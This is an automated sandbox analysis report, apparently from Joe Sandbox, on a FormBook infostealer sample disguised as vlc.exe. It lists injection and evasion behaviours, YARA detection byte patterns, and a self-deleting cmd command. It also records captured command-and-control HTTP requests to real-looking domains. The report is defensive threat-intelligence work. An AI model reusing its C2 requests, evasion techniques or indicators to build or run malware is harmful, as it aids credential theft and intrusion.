Loading ...

Play interactive tourEdit tour

Analysis Report SecuriteInfo.com.Generic.mg.7e26e87ab642008d.31908

Overview

General Information

Sample Name:SecuriteInfo.com.Generic.mg.7e26e87ab642008d.31908 (renamed file extension from 31908 to exe)
Analysis ID:323829
MD5:7e26e87ab642008d934824d509559859
SHA1:3d4dc73fee1b191c2b942e28920c37c82d38b0ed
SHA256:3176528c561817095af859f4809a2091f8557f93c27a0fe32ee71c8fc3b71f33

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • vlc.exe (PID: 4544 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe' MD5: 7E26E87AB642008D934824D509559859)
    • vlc.exe (PID: 6504 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe MD5: 7E26E87AB642008D934824D509559859)
      • explorer.exe (PID: 3440 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • msdt.exe (PID: 3424 cmdline: C:\Windows\SysWOW64\msdt.exe MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
          • cmd.exe (PID: 7072 cmdline: /c del 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 7048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • wscript.exe (PID: 4624 cmdline: C:\Windows\SysWOW64\wscript.exe MD5: 7075DD7B9BE8807FCA93ACD86F724884)
  • vlc.exe (PID: 6512 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe' MD5: 7E26E87AB642008D934824D509559859)
    • vlc.exe (PID: 6880 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe MD5: 7E26E87AB642008D934824D509559859)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000C.00000002.602316294.0000000000C40000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000C.00000002.602316294.0000000000C40000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000C.00000002.602316294.0000000000C40000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18409:$sqlite3step: 68 34 1C 7B E1
    • 0x1851c:$sqlite3step: 68 34 1C 7B E1
    • 0x18438:$sqlite3text: 68 38 2A 90 C5
    • 0x1855d:$sqlite3text: 68 38 2A 90 C5
    • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
    0000000C.00000002.603587464.0000000002FB0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      0000000C.00000002.603587464.0000000002FB0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 34 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      5.2.vlc.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        5.2.vlc.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        5.2.vlc.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17609:$sqlite3step: 68 34 1C 7B E1
        • 0x1771c:$sqlite3step: 68 34 1C 7B E1
        • 0x17638:$sqlite3text: 68 38 2A 90 C5
        • 0x1775d:$sqlite3text: 68 38 2A 90 C5
        • 0x1764b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17773:$sqlite3blob: 68 53 D8 7F 8C
        11.2.vlc.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          11.2.vlc.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus / Scanner detection for submitted sampleShow sources
          Source: SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeAvira: detected
          Antivirus detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeAvira: detection malicious, Label: HEUR/AGEN.1136389
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeReversingLabs: Detection: 29%
          Multi AV Scanner detection for submitted fileShow sources
          Source: SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeVirustotal: Detection: 30%Perma Link
          Source: SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeReversingLabs: Detection: 29%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000C.00000002.602316294.0000000000C40000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.603587464.0000000002FB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.362182042.0000000004291000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.472784516.00000000016C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.430429619.0000000001580000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.395346123.0000000003E81000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.472823831.00000000016F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.421292153.0000000003831000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.429223817.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.469558497.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.430333784.0000000001550000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.361705637.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.471808114.0000000000590000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.vlc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.2.vlc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.2.vlc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vlc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeJoe Sandbox ML: detected
          Machine Learning detection for sampleShow sources
          Source: SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeJoe Sandbox ML: detected
          Source: 5.2.vlc.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.2.SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 11.2.vlc.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeFile opened: C:\Users\user\
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeFile opened: C:\Users\user\AppData\
          Source: global trafficHTTP traffic detected: GET /gwg/?9rn=O2JDHJlpz2Rt546p&kzrh28=UuziJZlLt+87/GFWj6zrBRQcAJHtDZRD1SjQzE3VTJ8o0dUkW9Z3aESqk1e2d0LlVQYkCVOcaQ== HTTP/1.1Host: www.theaterseverywhere.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /gwg/?kzrh28=aQP8xClfH3FnyC2bbHADmWrvnT3A6FAlsj34gFGOFlECHJLTyiLQwMrWm8hFX/dhtuP/m5zmeg==&9rn=O2JDHJlpz2Rt546p HTTP/1.1Host: www.privateinvestigationsanjose.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 52.58.78.16 52.58.78.16
          Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
          Source: Joe Sandbox ViewASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
          Source: global trafficHTTP traffic detected: GET /gwg/?9rn=O2JDHJlpz2Rt546p&kzrh28=UuziJZlLt+87/GFWj6zrBRQcAJHtDZRD1SjQzE3VTJ8o0dUkW9Z3aESqk1e2d0LlVQYkCVOcaQ== HTTP/1.1Host: www.theaterseverywhere.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /gwg/?kzrh28=aQP8xClfH3FnyC2bbHADmWrvnT3A6FAlsj34gFGOFlECHJLTyiLQwMrWm8hFX/dhtuP/m5zmeg==&9rn=O2JDHJlpz2Rt546p HTTP/1.1Host: www.privateinvestigationsanjose.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: cdn.onenote.net
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 1364Connection: closeDate: Fri, 27 Nov 2020 14:58:33 GMTServer: ApacheX-Frame-Options: denyData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 57 22 20 6e 61 6d 65 3d 22 65 78 70 69 72 65 73 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 47 4f 4f 47 4c 45 42 4f 54 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 46 6f 6c 6c 6f 77 69 6e 67 20 4d 65 74 61 2d 54 61 67 20 66 69 78 65 73 20 73 63 61 6c 69 6e 67 2d 69 73 73 75 65 73 20 6f 6e 20 6d 6f 62 69 6c 65 20 64 65 76 69 63 65 73 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 3b 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 3b 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 74 6e 65 72 22 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 7
          Source: SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe, 00000000.00000002.366962936.00000000063B0000.00000002.00000001.sdmp, vlc.exe, 00000002.00000002.399391314.0000000005FF0000.00000002.00000001.sdmp, vlc.exe, 00000006.00000002.426387479.0000000005910000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.426302286.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe, 00000000.00000003.346139320.000000000630A000.00000004.00000001.sdmpString found in binary or memory: http://www.agfamonotype.
          Source: SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe, 00000000.00000002.366962936.00000000063B0000.00000002.00000001.sdmp, vlc.exe, 00000002.00000002.399391314.0000000005FF0000.00000002.00000001.sdmp, vlc.exe, 00000006.00000002.426387479.0000000005910000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.426302286.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe, 00000000.00000003.340913274.00000000062FB000.00000004.00000001.sdmpString found in binary or memory: http://www.ascendercorp.com/typedesigners.html6
          Source: explorer.exe, 00000007.00000000.397228054.000000000095C000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe, 00000000.00000002.366962936.00000000063B0000.00000002.00000001.sdmp, vlc.exe, 00000002.00000002.399391314.0000000005FF0000.00000002.00000001.sdmp, vlc.exe, 00000006.00000002.426387479.0000000005910000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.426302286.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe, 00000000.00000002.366962936.00000000063B0000.00000002.00000001.sdmp, vlc.exe, 00000002.00000002.399391314.0000000005FF0000.00000002.00000001.sdmp, vlc.exe, 00000006.00000002.426387479.0000000005910000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.426302286.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe, 00000000.00000003.342799792.00000000062C6000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com.TTF
          Source: explorer.exe, 00000007.00000000.426302286.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe, 00000000.00000002.366962936.00000000063B0000.00000002.00000001.sdmp, vlc.exe, 00000002.00000002.399391314.0000000005FF0000.00000002.00000001.sdmp, vlc.exe, 00000006.00000002.426387479.0000000005910000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.426302286.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe, 00000000.00000002.366962936.00000000063B0000.00000002.00000001.sdmp, vlc.exe, 00000002.00000002.399391314.0000000005FF0000.00000002.00000001.sdmp, vlc.exe, 00000006.00000002.426387479.0000000005910000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.426302286.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe, 00000000.00000002.366962936.00000000063B0000.00000002.00000001.sdmp, vlc.exe, 00000002.00000002.399391314.0000000005FF0000.00000002.00000001.sdmp, vlc.exe, 00000006.00000002.426387479.0000000005910000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.426302286.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe, 00000000.00000003.342152773.00000000062F3000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.htmlU
          Source: SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe, 00000000.00000002.366962936.00000000063B0000.00000002.00000001.sdmp, vlc.exe, 00000002.00000002.399391314.0000000005FF0000.00000002.00000001.sdmp, vlc.exe, 00000006.00000002.426387479.0000000005910000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.426302286.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe, 00000000.00000002.366962936.00000000063B0000.00000002.00000001.sdmp, vlc.exe, 00000002.00000002.399391314.0000000005FF0000.00000002.00000001.sdmp, vlc.exe, 00000006.00000002.426387479.0000000005910000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.426302286.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe, 00000000.00000002.366962936.00000000063B0000.00000002.00000001.sdmp, vlc.exe, 00000002.00000002.399391314.0000000005FF0000.00000002.00000001.sdmp, vlc.exe, 00000006.00000002.426387479.0000000005910000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.426302286.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe, 00000000.00000003.342799792.00000000062C6000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comC.TTF
          Source: SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe, 00000000.00000003.342799792.00000000062C6000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comWU
          Source: SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe, 00000000.00000002.366812851.00000000062C0000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.coma
          Source: SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe, 00000000.00000003.342799792.00000000062C6000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comalic
          Source: SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe, 00000000.00000003.342799792.00000000062C6000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comcomd
          Source: SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe, 00000000.00000002.366812851.00000000062C0000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.coml1
          Source: SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe, 00000000.00000002.366812851.00000000062C0000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comm
          Source: SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe, 00000000.00000003.342799792.00000000062C6000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.como)U
          Source: SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe, 00000000.00000002.366962936.00000000063B0000.00000002.00000001.sdmp, vlc.exe, 00000002.00000002.399391314.0000000005FF0000.00000002.00000001.sdmp, vlc.exe, 00000006.00000002.426387479.0000000005910000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.426302286.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe, 00000000.00000002.366962936.00000000063B0000.00000002.00000001.sdmp, vlc.exe, 00000002.00000002.399391314.0000000005FF0000.00000002.00000001.sdmp, vlc.exe, 00000006.00000002.426387479.0000000005910000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.426302286.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe, 00000000.00000003.339567937.00000000062CA000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/
          Source: SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe, 00000000.00000002.366962936.00000000063B0000.00000002.00000001.sdmp, vlc.exe, 00000002.00000002.399391314.0000000005FF0000.00000002.00000001.sdmp, vlc.exe, 00000006.00000002.426387479.0000000005910000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.426302286.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe, 00000000.00000002.366962936.00000000063B0000.00000002.00000001.sdmp, vlc.exe, 00000002.00000002.399391314.0000000005FF0000.00000002.00000001.sdmp, vlc.exe, 00000006.00000002.426387479.0000000005910000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.426302286.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe, 00000000.00000002.366962936.00000000063B0000.00000002.00000001.sdmp, vlc.exe, 00000002.00000002.399391314.0000000005FF0000.00000002.00000001.sdmp, vlc.exe, 00000006.00000002.426387479.0000000005910000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.426302286.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
